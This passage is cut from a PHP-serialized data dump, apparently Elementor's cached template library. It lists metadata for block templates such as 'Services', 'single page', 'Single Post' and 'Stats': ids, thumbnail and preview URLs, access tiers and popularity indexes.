24\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_4.png\";s:12:\"tmpl_created\";i:1520443261;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-24/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:579;s:16:\"popularity_index\";i:353;s:11:\"trend_index\";i:514;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:724;a:21:{s:4:\"tmpl\";i:406;s:2:\"id\";i:4260;s:5:\"title\";s:11:\"Services 25\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_3.png\";s:12:\"tmpl_created\";i:1520443257;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-25/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:580;s:16:\"popularity_index\";i:184;s:11:\"trend_index\";i:209;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:725;a:21:{s:4:\"tmpl\";i:404;s:2:\"id\";i:4244;s:5:\"title\";s:11:\"Services 26\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_2.png\";s:12:\"tmpl_created\";i:1520443253;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-26/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:581;s:16:\"popularity_index\";i:544;s:11:\"trend_index\";i:596;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:726;a:21:{s:4:\"tmpl\";i:421;s:2:\"id\";i:4400;s:5:\"title\";s:11:\"Services 27\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_13.png\";s:12:\"tmpl_created\";i:1520443285;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-27/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:582;s:16:\"popularity_index\";i:286;s:11:\"trend_index\";i:438;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:727;a:21:{s:4:\"tmpl\";i:419;s:2:\"id\";i:4376;s:5:\"title\";s:11:\"Services 28\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_12.png\";s:12:\"tmpl_created\";i:1520443281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-28/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:583;s:16:\"popularity_index\";i:151;s:11:\"trend_index\";i:249;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:728;a:21:{s:4:\"tmpl\";i:416;s:2:\"id\";i:4349;s:5:\"title\";s:11:\"Services 29\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_11.png\";s:12:\"tmpl_created\";i:1520443275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:584;s:16:\"popularity_index\";i:330;s:11:\"trend_index\";i:483;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:729;a:21:{s:4:\"tmpl\";i:402;s:2:\"id\";i:4227;s:5:\"title\";s:11:\"Services 30\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_1.png\";s:12:\"tmpl_created\";i:1520443250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-30/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:585;s:16:\"popularity_index\";i:351;s:11:\"trend_index\";i:553;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:730;a:21:{s:4:\"tmpl\";i:560;s:2:\"id\";i:6162;s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";i:1520443668;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-31/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:586;s:16:\"popularity_index\";i:372;s:11:\"trend_index\";i:550;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:731;a:21:{s:4:\"tmpl\";i:411;s:2:\"id\";i:4302;s:5:\"title\";s:10:\"Services 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_7.png\";s:12:\"tmpl_created\";i:1520443266;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:587;s:16:\"popularity_index\";i:58;s:11:\"trend_index\";i:97;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:732;a:21:{s:4:\"tmpl\";i:410;s:2:\"id\";i:4293;s:5:\"title\";s:10:\"Services 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_6.png\";s:12:\"tmpl_created\";i:1520443265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:588;s:16:\"popularity_index\";i:288;s:11:\"trend_index\";i:269;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:733;a:21:{s:4:\"tmpl\";i:409;s:2:\"id\";i:4284;s:5:\"title\";s:10:\"Services 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_5.png\";s:12:\"tmpl_created\";i:1520443263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:589;s:16:\"popularity_index\";i:27;s:11:\"trend_index\";i:21;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:734;a:21:{s:4:\"tmpl\";i:407;s:2:\"id\";i:4268;s:5:\"title\";s:10:\"Services 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_4.png\";s:12:\"tmpl_created\";i:1520443259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:590;s:16:\"popularity_index\";i:173;s:11:\"trend_index\";i:213;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:735;a:21:{s:4:\"tmpl\";i:405;s:2:\"id\";i:4252;s:5:\"title\";s:10:\"Services 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_3.png\";s:12:\"tmpl_created\";i:1520443255;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:591;s:16:\"popularity_index\";i:46;s:11:\"trend_index\";i:99;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:736;a:21:{s:4:\"tmpl\";i:677;s:2:\"id\";i:8676;s:5:\"title\";s:13:\"single page 1\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.6.jpg\";s:12:\"tmpl_created\";i:1527682423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:592;s:16:\"popularity_index\";i:285;s:11:\"trend_index\";i:145;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:737;a:21:{s:4:\"tmpl\";i:678;s:2:\"id\";i:8678;s:5:\"title\";s:13:\"single page 2\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.2.jpg\";s:12:\"tmpl_created\";i:1527682780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:593;s:16:\"popularity_index\";i:140;s:11:\"trend_index\";i:82;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:738;a:21:{s:4:\"tmpl\";i:679;s:2:\"id\";i:8679;s:5:\"title\";s:13:\"single page 3\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.3.jpg\";s:12:\"tmpl_created\";i:1527682847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:594;s:16:\"popularity_index\";i:122;s:11:\"trend_index\";i:23;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:739;a:21:{s:4:\"tmpl\";i:680;s:2:\"id\";i:8680;s:5:\"title\";s:13:\"single page 4\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.1.jpg\";s:12:\"tmpl_created\";i:1527682896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:595;s:16:\"popularity_index\";i:373;s:11:\"trend_index\";i:190;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:740;a:21:{s:4:\"tmpl\";i:681;s:2:\"id\";i:8681;s:5:\"title\";s:13:\"single page 5\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.5.jpg\";s:12:\"tmpl_created\";i:1527682969;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:596;s:16:\"popularity_index\";i:287;s:11:\"trend_index\";i:218;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:741;a:21:{s:4:\"tmpl\";i:682;s:2:\"id\";i:8682;s:5:\"title\";s:13:\"single page 6\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.4.jpg\";s:12:\"tmpl_created\";i:1527683026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:597;s:16:\"popularity_index\";i:412;s:11:\"trend_index\";i:227;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:742;a:21:{s:4:\"tmpl\";i:683;s:2:\"id\";i:8703;s:5:\"title\";s:13:\"single page 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.7.jpg\";s:12:\"tmpl_created\";i:1527683072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:598;s:16:\"popularity_index\";i:401;s:11:\"trend_index\";i:316;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:743;a:21:{s:4:\"tmpl\";i:640;s:2:\"id\";i:7650;s:5:\"title\";s:13:\"Single Post 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_1_v2.jpg\";s:12:\"tmpl_created\";i:1521557736;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:599;s:16:\"popularity_index\";i:119;s:11:\"trend_index\";i:266;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:744;a:21:{s:4:\"tmpl\";i:639;s:2:\"id\";i:7663;s:5:\"title\";s:13:\"Single Post 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_2_v2.jpg\";s:12:\"tmpl_created\";i:1521547761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:600;s:16:\"popularity_index\";i:50;s:11:\"trend_index\";i:139;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:745;a:21:{s:4:\"tmpl\";i:705;s:2:\"id\";i:9296;s:5:\"title\";s:13:\"Single Post 3\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3002.jpg\";s:12:\"tmpl_created\";i:1537440673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:601;s:16:\"popularity_index\";i:213;s:11:\"trend_index\";i:204;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:746;a:21:{s:4:\"tmpl\";i:704;s:2:\"id\";i:9301;s:5:\"title\";s:13:\"Single Post 4\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3003.jpg\";s:12:\"tmpl_created\";i:1537440661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:602;s:16:\"popularity_index\";i:248;s:11:\"trend_index\";i:336;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:747;a:21:{s:4:\"tmpl\";i:706;s:2:\"id\";i:9313;s:5:\"title\";s:13:\"Single Post 5\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3001.jpg\";s:12:\"tmpl_created\";i:1537440798;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:603;s:16:\"popularity_index\";i:197;s:11:\"trend_index\";i:177;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:748;a:21:{s:4:\"tmpl\";i:707;s:2:\"id\";i:9343;s:5:\"title\";s:13:\"Single Post 6\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3004.jpg\";s:12:\"tmpl_created\";i:1537443531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:604;s:16:\"popularity_index\";i:228;s:11:\"trend_index\";i:279;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:749;a:21:{s:4:\"tmpl\";i:708;s:2:\"id\";i:9349;s:5:\"title\";s:13:\"Single Post 7\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3005.jpg\";s:12:\"tmpl_created\";i:1537443903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:605;s:16:\"popularity_index\";i:158;s:11:\"trend_index\";i:253;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:750;a:21:{s:4:\"tmpl\";i:555;s:2:\"id\";i:6114;s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";i:1520443659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:610;s:16:\"popularity_index\";i:434;s:11:\"trend_index\";i:692;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:751;a:21:{s:4:\"tmpl\";i:562;s:2:\"id\";i:6178;s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";i:1520443676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:611;s:16:\"popularity_index\";i:435;s:11:\"trend_index\";i:755;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:752;a:21:{s:4:\"tmpl\";i:561;s:2:\"id\";i:6170;s:5:\"title\";s:8:\"Stats 